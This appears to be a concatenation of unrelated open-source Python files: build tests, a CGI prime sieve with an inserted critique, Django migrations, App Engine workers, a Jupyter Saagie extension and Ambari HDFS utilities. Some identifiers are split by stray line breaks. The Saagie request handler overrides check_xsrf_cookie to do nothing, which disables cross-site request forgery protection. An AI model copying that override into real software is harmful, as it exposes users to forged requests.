raise unittest.SkipTest("GccCompileTest class: SDK doesn't contain a cross-canadian toolchain") def test_gcc_compile(self): self._run('$CC %s/test.c -o %s/test -lm' % (self.tc.sdk_dir, self.tc.sdk_dir)) def test_gpp_compile(self): self._run('$CXX %s/test.c -o %s/test -lm' % (self.tc.sdk_dir, self.tc.sdk_dir)) def test_gpp2_compile(self): self._run('$CXX %s/test.cpp -o %s/test -lm' % (self.tc.sdk_dir, self.tc.sdk_dir)) def test_make(self): self._run('cd %s; make -f testsdkmakefile' % self.tc.sdk_dir) @classmethod def tearDownClass(self): files = [os.path.join(self.tc.sdk_dir, f) \ for f in ['test.c', 'test.cpp', 'test.o', 'test', 'testsdkmakefile']] for f in files: remove_safe(f)
JulianNicholls/Complete-Web-Course-2.0
13-Python/challenge2.py
Python
mit
249
0.012048
#!
/usr/bin/env python3 print('Content-type: text/html') print() primes = [2, *range(3, 10001, 2)] for div in primes: idx = div + 1 while(idx < len(primes)): if (primes[idx] % div == 0): del primes
[idx] idx += 1 print(primes)
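The deletion-based loop above produces the right output for this range, but it mutates the list while iterating over it, and its correctness is subtle: the `idx = div + 1` starting point only happens to be safe because earlier passes have already removed the smaller composites. A conventional Sieve of Eratosthenes over the same range is easier to reason about; a sketch:

#!/usr/bin/env python3

def primes_below(n):
    """Classic Sieve of Eratosthenes: mark composites, keep the rest."""
    is_prime = [True] * n
    is_prime[0] = is_prime[1] = False
    for p in range(2, int(n ** 0.5) + 1):
        if is_prime[p]:
            for multiple in range(p * p, n, p):
                is_prime[multiple] = False
    return [i for i, flag in enumerate(is_prime) if flag]

print(primes_below(10001))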
EmanueleCannizzaro/scons
test/SWIG/SWIGOUTDIR.py
Python
mit
2,897
0.005178
#!/usr/bin/env python # # Copyright (c) 2001 - 2016 The SCons Foundation # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY # KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE # WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # __revision__ = "test/SWIG/SWIGOUTDIR.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog" """ Verify that use of the $SWIGOUTDIR variable causes SCons to recognize that Java files are created in the specified output directory. """ import TestSCons test = TestSCons.TestSCons() swig = test.where_is('swig') if not swig: test.skip_test('Can not find installed "swig", skipping test.\n') where_java_include=test.java_where_includes() if not where_java_include: test.skip_test('Can not find installed Java include files, skipping test.\n') test.write(['SConstruct'], """\ env = Environment(tools = ['default', 'swig'], CPPPATH=%(where_java_include)s, ) Java_foo_interface = env.SharedLibrary( 'Java_foo_interface', 'Java_foo_interface.i'
, SWIGOUTDIR = 'java/build dir', SWIGFLAGS = '-c++ -java -Wall', SWIGCXXFILES
UFFIX = "_wrap.cpp") """ % locals()) test.write('Java_foo_interface.i', """\ %module foopack """) # SCons should realize that it needs to create the "java/build dir" # subdirectory to hold the generated .java files. test.run(arguments = '.') test.must_exist('java/build dir/foopackJNI.java') test.must_exist('java/build dir/foopack.java') # SCons should remove the built .java files. test.run(arguments = '-c') test.must_not_exist('java/build dir/foopackJNI.java') test.must_not_exist('java/build dir/foopack.java') # SCons should realize it needs to rebuild the removed .java files. test.not_up_to_date(arguments = '.') test.must_exist('java/build dir/foopackJNI.java') test.must_exist('java/build dir/foopack.java') test.pass_test() # Local Variables: # tab-width:4 # indent-tabs-mode:nil # End: # vim: set expandtab tabstop=4 shiftwidth=4:
jerome-jacob/selenium
py/test/selenium/webdriver/firefox/ff_select_support_class_tests.py
Python
apache-2.0
1,419
0.002819
# Licensed to the Software Freedom Conservancy (SFC) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The SFC
licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from selenium import webdriver from selenium.test.selenium.webdriver.common import select_class_tests from selenium.test.selenium.webdriver.common.webserver import SimpleWebServer def setup_module(module): webserver = SimpleWebServer() webserver.start() FirefoxSelectElementHandlingTests.webserver = webserver FirefoxSelectElementHandlingTests.driver = webdriver.Firefox() class FirefoxSelectElementHandlingTests(select_class_tests.WebDriverSelectSupportTests): pass def teardown_module(module): FirefoxSelectElementHandlingTests.driver.quit() FirefoxSelectElementHandlingTests.webserver.stop()
billychow/simplelifestream
worker.py
Python
mit
1,047
0.029608
from google.appengine.ext import webapp from google.appengine.ext.webapp import util from google.appengine.api.labs import taskqueue from google.appengine.api import memcache from lifestream import * class LifeStr
eamQueueWorker(webapp.RequestHandler): def get(self): memcache.set('fresh_count', 0) indexes = LifeStream.instance().indexes
for index in indexes: taskqueue.add(url='/app_worker/task', method='GET', params={'index':index}) taskqueue.add(url='/app_worker/refresh', method='GET', countdown=10) class LifeStreamTaskWorker(webapp.RequestHandler): def get(self): index = int(self.request.get('index')) LifeStream.update_feed(index) class LifeStreamRefreshWorker(webapp.RequestHandler): def get(self): LifeStream.refresh_stream() def main(): application = webapp.WSGIApplication([ ('/app_worker/queue', LifeStreamQueueWorker), ('/app_worker/task', LifeStreamTaskWorker), ('/app_worker/refresh', LifeStreamRefreshWorker) ], debug=True) util.run_wsgi_app(application) if __name__ == '__main__': main()
saagie/jupyter-saagie-plugin
saagie/server_extension.py
Python
apache-2.0
16,090
0.00174
from functools import wraps import json import os import traceback import validators from jinja2 import Environment, PackageLoader from notebook.utils import url_path_join from notebook.base.handlers import IPythonHandler import requests from requests.auth import HTTPBasicAuth env = Environment( loader=PackageLoader('saagie', 'jinja2'), ) SAAGIE_ROOT_URL = os.environ.get("SAAGIE_ROOT_URL", None) SAAGIE_USERNAME = None PLATFORMS_URL = None SAAGIE_BASIC_AUTH_TOKEN = None JOBS_URL_PATTERN = None JOB_URL_PATTERN = None JOB_UPGRADE_URL_PATTERN = None SCRIPT_UPLOAD_URL_PATTERN = None def get_absolute_saagie_url(saagie_url): if saagie_url.startswith('/'): return SAAGIE_ROOT_URL + saagie_url return saagie_url class ResponseError(Exception): def __init__(self, status_code): self.status_code = status_code super(ResponseError, self).__init__(status_code) class SaagieHandler(IPythonHandler): def handle_request(self, method): data = {k: v[0].decode() for k, v in self.request.arguments.items()} if 'view' not in data: self.send_error(404) return view_name = data.pop('view') notebook_path = data.pop('notebook_path', None) notebook_json = data.pop('notebook_json', None) notebook = Notebook(notebook_path, notebook_json) try: template_name, template_data = views.render( view_name, notebook=notebook, data=data, method=method) except ResponseError as e: self.send_error(e.status_code) return except: template_name = 'internal_error.html' template_data = {'error': traceback.format_exc()} self.set_status(500) template_data.update( notebook=notebook, ) template = env.get_template(template_name) self.finish(template.render(template_data)) def get(self): self.handle_request('GET') def post(self): self.handle_request('POST')
def check_xsrf_cookie(self): return
class SaagieCheckHandler(IPythonHandler): def get(self): self.finish() class SaagieJobRun: def __init__(self, job, run_data): self.job = job self.id = run_data['id'] self.status = run_data['status'] self.stderr = run_data.get('logs_err', '') self.stdout = run_data.get('logs_out', '') class SaagieJob: @classmethod def from_id(cls, notebook, platform_id, job_id): return SaagieJob( notebook, requests.get(JOB_URL_PATTERN % (platform_id, job_id), auth=SAAGIE_BASIC_AUTH_TOKEN).json()) def __init__(self, notebook, job_data): self.notebook = notebook self.data = job_data self.platform_id = job_data['platform_id'] self.capsule_type = job_data['capsule_code'] self.id = job_data['id'] self.name = job_data['name'] self.last_run = None def set_as_current(self): self.notebook.current_job = self @property def url(self): return (JOBS_URL_PATTERN + '/%s') % (self.platform_id, self.id) @property def admin_url(self): return get_absolute_saagie_url('/#/manager/%s/job/%s' % (self.platform_id, self.id)) @property def logs_url(self): return self.admin_url + '/logs' @property def is_started(self): return self.last_run is not None def fetch_logs(self): job_data = requests.get(self.url, auth=SAAGIE_BASIC_AUTH_TOKEN).json() run_data = job_data.get('last_instance') if run_data is None or run_data['status'] not in ('SUCCESS', 'FAILED'): return run_data = requests.get( get_absolute_saagie_url('/api/v1/jobtask/%s' % run_data['id']), auth=SAAGIE_BASIC_AUTH_TOKEN).json() self.last_run = SaagieJobRun(self, run_data) @property def details_template_name(self): return 'include/python_job_details.html' def __str__(self): return self.name def __eq__(self, other): if other is None: return False return self.platform_id == other.platform_id and self.id == other.id def __lt__(self, other): if other is None: return False return self.id < other.id class SaagiePlatform: SUPPORTED_CAPSULE_TYPES = {'python'} def __init__(self, notebook, platform_data): self.notebook = notebook self.id = platform_data['id'] self.name = platform_data['name'] self.capsule_types = {c['code'] for c in platform_data['capsules']} @property def is_supported(self): return not self.capsule_types.isdisjoint(self.SUPPORTED_CAPSULE_TYPES) def get_jobs(self): if not self.is_supported: return [] jobs_data = requests.get(JOBS_URL_PATTERN % self.id, auth=SAAGIE_BASIC_AUTH_TOKEN).json() return [SaagieJob(self.notebook, job_data) for job_data in jobs_data if job_data['category'] == 'processing' and job_data['capsule_code'] in self.SUPPORTED_CAPSULE_TYPES] def __eq__(self, other): return self.id == other.id class Notebook: CACHE = {} def __new__(cls, path, json): if path in cls.CACHE: return cls.CACHE[path] cls.CACHE[path] = new = super(Notebook, cls).__new__(cls) return new def __init__(self, path, json_data): if path is None: path = 'Untitled.ipynb' if json_data is None: json_data = json.dumps({ 'cells': [], 'metadata': {'kernelspec': {'name': 'python3'}}}) self.path = path self.json = json.loads(json_data) # In cached instances, current_job is already defined. 
if not hasattr(self, 'current_job'): self.current_job = None @property def name(self): return os.path.splitext(os.path.basename(self.path))[0] @property def kernel_name(self): return self.json['metadata']['kernelspec']['name'] @property def kernel_display_name(self): return self.json['metadata']['kernelspec']['display_name'] def get_code_cells(self): return [cell['source'] for cell in self.json['cells'] if cell['cell_type'] == 'code'] def get_code(self, indices=None): cells = self.get_code_cells() if indices is None: indices = list(range(len(cells))) return '\n\n\n'.join([cells[i] for i in indices]) def get_platforms(self): return [SaagiePlatform(self, platform_data) for platform_data in requests.get(PLATFORMS_URL, auth=SAAGIE_BASIC_AUTH_TOKEN).json()] class ViewsCollection(dict): def add(self, func): self[func.__name__] = func return func def render(self, view_name, notebook, data=None, method='GET', **kwargs): if data is None: data = {} try: view = views[view_name] except KeyError: raise ResponseError(404) template_data = view(method, notebook, data, **kwargs) if isinstance(template_data, tuple): template_name, template_data = template_data else: template_name = view.__name__ + '.html' return template_name, template_data views = ViewsCollection() @views.add def modal(method, notebook, data): return {} def clear_basic_auth_token(): global SAAGIE_BASIC_AUTH_TOKEN SAAGIE_BASIC_AUTH_TOKEN = None # Init an empty Basic Auth token on first launch clear_basic_auth_token() def is_logged(): if SAAGIE_ROOT_URL is None or SAAGIE_BASIC_AUTH_TOKEN is None: return False else: # Check if Basic token is still valid is_logged_in = False try: response = requests.get(SAAGIE_ROOT_URL + '/api/v1/user-current', auth=SAAGIE_BASIC_AUTH_TOKEN, allow_redirects=False) is_logged_in = response.ok except (requests.ConnectionError, requests.RequestException, requests.HTTPError
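The record above is cut off inside `is_logged`, but the pattern it implements is a simple credential probe with `requests`; a minimal standalone version, under the assumption that the endpoint returns a 2xx status for valid Basic credentials (the URL and credentials below are placeholders):

import requests
from requests.auth import HTTPBasicAuth

def token_still_valid(root_url, user, password):
    """Return True if the Basic credentials are still accepted by the server."""
    try:
        response = requests.get(root_url + '/api/v1/user-current',
                                auth=HTTPBasicAuth(user, password),
                                allow_redirects=False, timeout=10)
    except requests.RequestException:
        return False
    return response.ok

# token_still_valid('https://saagie.example.com', 'user', 'secret')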
pinax/pinax-blog
pinax/blog/migrations/0007_auto_20161223_1013.py
Python
mit
752
0.00266
# -*- coding: utf-8 -*- # Generated by Django 1.10.3 on 2016-12-23 10:13 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('blog', '0006_auto_20160321_1527'), ] operations = [ migrations.CreateModel( name='Blog', fields=[ ('id', models.AutoField(auto_creat
ed=True, primary_key=True, serialize=False, verbose_name='ID')), ], ), migrations.AddField( model_name='post', name='blog', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='blog.Blog'), ),
]
watchdogpolska/feder
feder/cases/migrations/0016_auto_20211021_0245.py
Python
mit
423
0
# Generated by Django 2.2.24 on 2021-1
0-21 02:45 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("cases", "0015_case_is_quarantied"), ] operations = [ migrations.AddIndex( model_name="case", index=models.Index(
fields=["created"], name="cases_case_created_a615f3_idx" ), ), ]
daynesh/ffstats
ffstats/wsgi.py
Python
apache-2.0
1,422
0.000703
""" WSGI config for ffstats project. This module contains the WSGI application used by Django's development server and any production WSGI deployments. It should expose a module-level variable named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover this application via the ``WSGI_APPLICATION`` setting. Usually you will have the standard Django WSGI application here, but it also might make sense
to replace the whole Dja
ngo WSGI application with a custom one that later delegates to the Django one. For example, you could introduce WSGI middleware here, or combine a Django application with an application of another framework. """ import os # We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks # if running multiple sites in the same mod_wsgi process. To fix this, use # mod_wsgi daemon mode with each site in its own daemon process, or use # os.environ["DJANGO_SETTINGS_MODULE"] = "ffstats.settings" os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ffstats.settings") # This application object is used by any WSGI server configured to use this # file. This includes Django's development server, if the WSGI_APPLICATION # setting points here. from django.core.wsgi import get_wsgi_application application = get_wsgi_application() # Apply WSGI middleware here. # from helloworld.wsgi import HelloWorldApplication # application = HelloWorldApplication(application)
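The commented-out tail of the file hints at wrapping `application` in WSGI middleware; a minimal sketch of what such a wrapper can look like (the header name is an arbitrary example, not part of ffstats):

class HeaderInjectionMiddleware:
    """Wrap a WSGI application and add a fixed response header."""

    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        def patched_start_response(status, headers, exc_info=None):
            headers.append(('X-Served-By', 'ffstats'))  # example header
            return start_response(status, headers, exc_info)

        return self.app(environ, patched_start_response)

# application = HeaderInjectionMiddleware(application)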
danmar/cppcheck
tools/listErrorsWithoutCWE.py
Python
gpl-3.0
710
0.005634
#!/usr/bin/env python from __future__ import print_function import argparse import xml.etree.ElementTree as ET def main(): parser = argparse.ArgumentParser(description="List all error without a CWE assigned in CSV format") parser.add_argument("-F", metavar="filename", required=True, help="XML file containing output from: ./cppcheck --errorlist --xml-version=2") parsed = parser.parse_args() tree = ET.parse(vars(parsed)["F"]) root = tree.getroot() for chil
d in root.iter("error"): if "cwe" not in child.attrib: print(child.attrib["id"], c
hild.attrib["severity"], child.attrib["verbose"], sep=", ") if __name__ == "__main__": main()
evildmp/django-curated-resources
curated_resources/filters.py
Python
bsd-2-clause
336
0.02381
import django_filters from .models import Resource class Reso
urceFilter(django_filters.FilterSet): class Meta: model = Resource fields = [ 'title', 'description', 'domains', 'topics', 'resource_type', 'suitable_for',
]
jonathansick/Ssstat
ssstat/download.py
Python
bsd-2-clause
1,488
0.008065
#!/usr/bin/env python # encoding: utf-8 """ Download command for ssstat--download logs without adding to MongoDB. 2012-11-18 - Created by Jonathan Sick """ import os import logging from cliff.command import Command import ingest_core class DownloadCommand(Command): """ssstat download""" log = logging.getLogger(__name__) def get_parser(self, progName): """Adds command line options.""" parser = super(DownloadCommand, self).get_parser(progName) parser.add_argument('log_bucket', help='Name of S3 Logging Bucket') parser.add_argument('prefix', help='Prefix for the desired log files') parser.add_argument('--cache-dir', default=os.path.expandvars("$HOME/.ssstat/cache"), action='store', dest='cache_dir', help='Local directory
where logs are cached') parser.add_argument('--delete', dest='delete', default=True, type=bool, help='Delete downloaded logs from S3') return parser def take_action(self, parsedArgs): """Runs the `ssstat do
wnload` command pipeline.""" self.log.debug("Running ssstat download") # Downloads logs into root of cache directory ingest_core.download_logs(parsedArgs.log_bucket, parsedArgs.prefix, parsedArgs.cache_dir, delete=parsedArgs.delete) def main(): pass if __name__ == '__main__': main()
zeptonaut/catapult
perf_insights/perf_insights/local_directory_corpus_driver_unittest.py
Python
bsd-3-clause
531
0.003766
# Copyright (c) 2015 The Chromium Authors. Al
l rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import unittest from perf_insights import local_directory_corpus_driver class LocalDirectoryCorpusDriverTests(unittest.TestCase): def testTags(self): self.assertEquals( local_directory_corpus_d
river._GetTagsForRelPath('a.json'), []) self.assertEquals( local_directory_corpus_driver._GetTagsForRelPath('/b/c/a.json'), ['b', 'c'])
alexryndin/ambari
ambari-server/src/main/resources/stacks/ADH/1.0/services/HDFS/package/scripts/utils.py
Python
apache-2.0
16,170
0.013296
""" Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import os import re import urllib2 import ambari_simplejson as json # simplejson is much faster comparing to Python 2.6 json module and has the same functions set. from resource_manage
ment.core.resources.system import Directory, File, Execute from resource_management.libraries.functions.format import format from resource_management
.libraries.functions import check_process_status from resource_management.libraries.functions import StackFeature from resource_management.libraries.functions.stack_features import check_stack_feature from resource_management.core import shell from resource_management.core.shell import as_user, as_sudo from resource_management.core.source import Template from resource_management.core.exceptions import ComponentIsNotRunning from resource_management.core.logger import Logger from resource_management.libraries.functions.curl_krb_request import curl_krb_request from resource_management.libraries.script.script import Script from resource_management.libraries.functions.namenode_ha_utils import get_namenode_states from resource_management.libraries.functions.show_logs import show_logs from ambari_commons.inet_utils import ensure_ssl_using_protocol from zkfc_slave import ZkfcSlaveDefault ensure_ssl_using_protocol( Script.get_force_https_protocol_name(), Script.get_ca_cert_file_path() ) def safe_zkfc_op(action, env): """ Idempotent operation on the zkfc process to either start or stop it. :param action: start or stop :param env: environment """ Logger.info("Performing action {0} on zkfc.".format(action)) zkfc = None if action == "start": try: ZkfcSlaveDefault.status_static(env) except ComponentIsNotRunning: ZkfcSlaveDefault.start_static(env) if action == "stop": try: ZkfcSlaveDefault.status_static(env) except ComponentIsNotRunning: pass else: ZkfcSlaveDefault.stop_static(env) def initiate_safe_zkfc_failover(): """ If this is the active namenode, initiate a safe failover and wait for it to become the standby. If an error occurs, force a failover to happen by killing zkfc on this host. In this case, during the Restart, will also have to start ZKFC manually. """ import params # Must kinit before running the HDFS command if params.security_enabled: Execute(format("{kinit_path_local} -kt {hdfs_user_keytab} {hdfs_principal_name}"), user = params.hdfs_user) active_namenode_id = None standby_namenode_id = None active_namenodes, standby_namenodes, unknown_namenodes = get_namenode_states(params.hdfs_site, params.security_enabled, params.hdfs_user) if active_namenodes: active_namenode_id = active_namenodes[0][0] if standby_namenodes: standby_namenode_id = standby_namenodes[0][0] if active_namenode_id: Logger.info(format("Active NameNode id: {active_namenode_id}")) if standby_namenode_id: Logger.info(format("Standby NameNode id: {standby_namenode_id}")) if unknown_namenodes: for unknown_namenode in unknown_namenodes: Logger.info("NameNode HA state for {0} is unknown".format(unknown_namenode[0])) if params.namenode_id == active_namenode_id and params.other_namenode_id == standby_namenode_id: # Failover if this NameNode is active and other NameNode is up and in standby (i.e. 
ready to become active on failover) Logger.info(format("NameNode {namenode_id} is active and NameNode {other_namenode_id} is in standby")) failover_command = format("hdfs haadmin -ns {dfs_ha_nameservices} -failover {namenode_id} {other_namenode_id}") check_standby_cmd = format("hdfs haadmin -ns {dfs_ha_nameservices} -getServiceState {namenode_id} | grep standby") msg = "Rolling Upgrade - Initiating a ZKFC failover on active NameNode host {0}.".format(params.hostname) Logger.info(msg) code, out = shell.call(failover_command, user=params.hdfs_user, logoutput=True) Logger.info(format("Rolling Upgrade - failover command returned {code}")) wait_for_standby = False if code == 0: wait_for_standby = True else: # Try to kill ZKFC manually was_zkfc_killed = kill_zkfc(params.hdfs_user) code, out = shell.call(check_standby_cmd, user=params.hdfs_user, logoutput=True) Logger.info(format("Rolling Upgrade - check for standby returned {code}")) if code == 255 and out: Logger.info("Rolling Upgrade - NameNode is already down.") else: if was_zkfc_killed: # Only mandate that this be the standby namenode if ZKFC was indeed killed to initiate a failover. wait_for_standby = True if wait_for_standby: Logger.info("Waiting for this NameNode to become the standby one.") Execute(check_standby_cmd, user=params.hdfs_user, tries=50, try_sleep=6, logoutput=True) else: msg = "Rolling Upgrade - Skipping ZKFC failover on NameNode host {0}.".format(params.hostname) Logger.info(msg) def kill_zkfc(zkfc_user): """ There are two potential methods for failing over the namenode, especially during a Rolling Upgrade. Option 1. Kill zkfc on primary namenode provided that the secondary is up and has zkfc running on it. Option 2. Silent failover :param zkfc_user: User that started the ZKFC process. :return: Return True if ZKFC was killed, otherwise, false. """ import params if params.dfs_ha_enabled: if params.zkfc_pid_file: check_process = as_user(format("ls {zkfc_pid_file} > /dev/null 2>&1 && ps -p `cat {zkfc_pid_file}` > /dev/null 2>&1"), user=zkfc_user) code, out = shell.call(check_process) if code == 0: Logger.debug("ZKFC is running and will be killed.") kill_command = format("kill -15 `cat {zkfc_pid_file}`") Execute(kill_command, user=zkfc_user ) File(params.zkfc_pid_file, action = "delete", ) return True return False def service(action=None, name=None, user=None, options="", create_pid_dir=False, create_log_dir=False): """ :param action: Either "start" or "stop" :param name: Component name, e.g., "namenode", "datanode", "secondarynamenode", "zkfc" :param user: User to run the command as :param options: Additional options to pass to command as a string :param create_pid_dir: Create PID directory :param create_log_dir: Crate log file directory """ import params options = options if options else "" pid_dir = format("{hadoop_pid_dir_prefix}/{user}") pid_file = format("{pid_dir}/hadoop-{user}-{name}.pid") hadoop_env_exports = { 'HADOOP_LIBEXEC_DIR': params.hadoop_libexec_dir } log_dir = format("{hdfs_log_dir_prefix}/{user}") # NFS GATEWAY is always started by root using jsvc due to rpcbind bugs # on Linux such as CentOS6.2. 
https://bugzilla.redhat.com/show_bug.cgi?id=731542 if name == "nfs3" : import status_params pid_file = status_params.nfsgateway_pid_file custom_export = { 'HADOOP_PRIVILEGED_NFS_USER': params.hdfs_user, 'HADOOP_PRIVILEGED_NFS_PID_DIR': pid_dir, 'HADOOP_PRIVILEGED_NFS_LOG_DIR': log_dir } hadoop_env_exports.update(custom_export) process_id_exists_command = as_sudo(["test", "-f", pid_file]) + " && " + as_sudo(["pgrep", "-F", pid_file]) # on STOP directories shouldn't be created # since during stop still old dirs are used (which were created
arasmus/ladder
utils.py
Python
mit
5,079
0.000788
import os import logging import numpy as np import theano from pandas import DataFrame, read_hdf from blocks.extensions import Printing, SimpleExtension from blocks.main_loop import MainLoop from blocks.roles import add_role logger = logging.getLogger('main.utils') def shared_param(init, name, cast_float32, role, **kwargs): if cast_float32: v = np.float32(init) p = theano.shared(v, name=name, **kwargs) add_role(p, role) return p class AttributeDict(dict): __getattr__ = dict.__getitem__ def __setattr__(self, a, b): self.__setitem__(a, b) class DummyLoop(MainLoop): def __init__(self, extensions): return super(DummyLoop, self).__init__(algorithm=None, data_stream=None, extensions=extensions) def run(self): for extension in self.extensions: extension.main_loop = self self._run_extensions('before_training') self._run_extensions('after_training') class ShortPrinting(Printing): def __init__(self, to_print, use_log=True, **kwargs): self.to_print = to_print self.use_log = use_log super(ShortPrinting, self).__init__(**kwargs) def do(self, which_callback, *args): log = self.main_loop.log # Iteration msg = "e {}, i {}:".format( log.status['epochs_done'], log.status['iterations_done']) # Requested channels items = [] for k, vars in self.to_print.iteritems(): for shortname, vars in vars.iteritems(): if vars is None: continue if type(vars) is not list: vars = [vars] s = "" for var in vars: try: name = k + '_' + var.name val = log.current_row[name] except: continue try: s += ' ' + ' '.join(["%.3g" % v for v in val]) except: s += " %.3g" % val if s != "": items += [shortname + s] msg = msg + ", ".join(items) if self.use_log: logger.info(msg) else: print msg class SaveParams(SimpleExtension): """Finishes the training process when triggered.""" def __init__(self, trigger_var, params, save_path, **kwargs): super(SaveParams, self).__init__(**kwargs) if trigger_var is None: self.var_name = None else: self.var_name = trigger_var[0] + '_' + trigger_var[1].name self.save_path = save_path self.params = params self.to_save = {} self.best_value = None self.add_condition(['after_training'], self.save) self.add_condition(['on_interrupt'], self.save) def sa
ve(self, which_callback, *args): if self.var_name is None: self.to_save = {v.name: v.get_value() for v in self.params} path = self.save_path + '/trained_params' logger.info('Saving to %s' % path) np.savez_compressed(path, **self.to_save) def do(self, w
hich_callback, *args): if self.var_name is None: return val = self.main_loop.log.current_row[self.var_name] if self.best_value is None or val < self.best_value: self.best_value = val self.to_save = {v.name: v.get_value() for v in self.params} class SaveExpParams(SimpleExtension): def __init__(self, experiment_params, dir, **kwargs): super(SaveExpParams, self).__init__(**kwargs) self.dir = dir self.experiment_params = experiment_params def do(self, which_callback, *args): df = DataFrame.from_dict(self.experiment_params, orient='index') df.to_hdf(os.path.join(self.dir, 'params'), 'params', mode='w', complevel=5, complib='blosc') class SaveLog(SimpleExtension): def __init__(self, dir, show=None, **kwargs): super(SaveLog, self).__init__(**kwargs) self.dir = dir self.show = show if show is not None else [] def do(self, which_callback, *args): df = DataFrame.from_dict(self.main_loop.log, orient='index') df.to_hdf(os.path.join(self.dir, 'log'), 'log', mode='w', complevel=5, complib='blosc') def prepare_dir(save_to, results_dir='results'): base = os.path.join(results_dir, save_to) i = 0 while True: name = base + str(i) try: os.makedirs(name) break except: i += 1 return name def load_df(dirpath, filename, varname=None): varname = filename if varname is None else varname fn = os.path.join(dirpath, filename) return read_hdf(fn, varname) def filter_funcs_prefix(d, pfx): pfx = 'cmd_' fp = lambda x: x.find(pfx) return {n[fp(n) + len(pfx):]: v for n, v in d.iteritems() if fp(n) >= 0}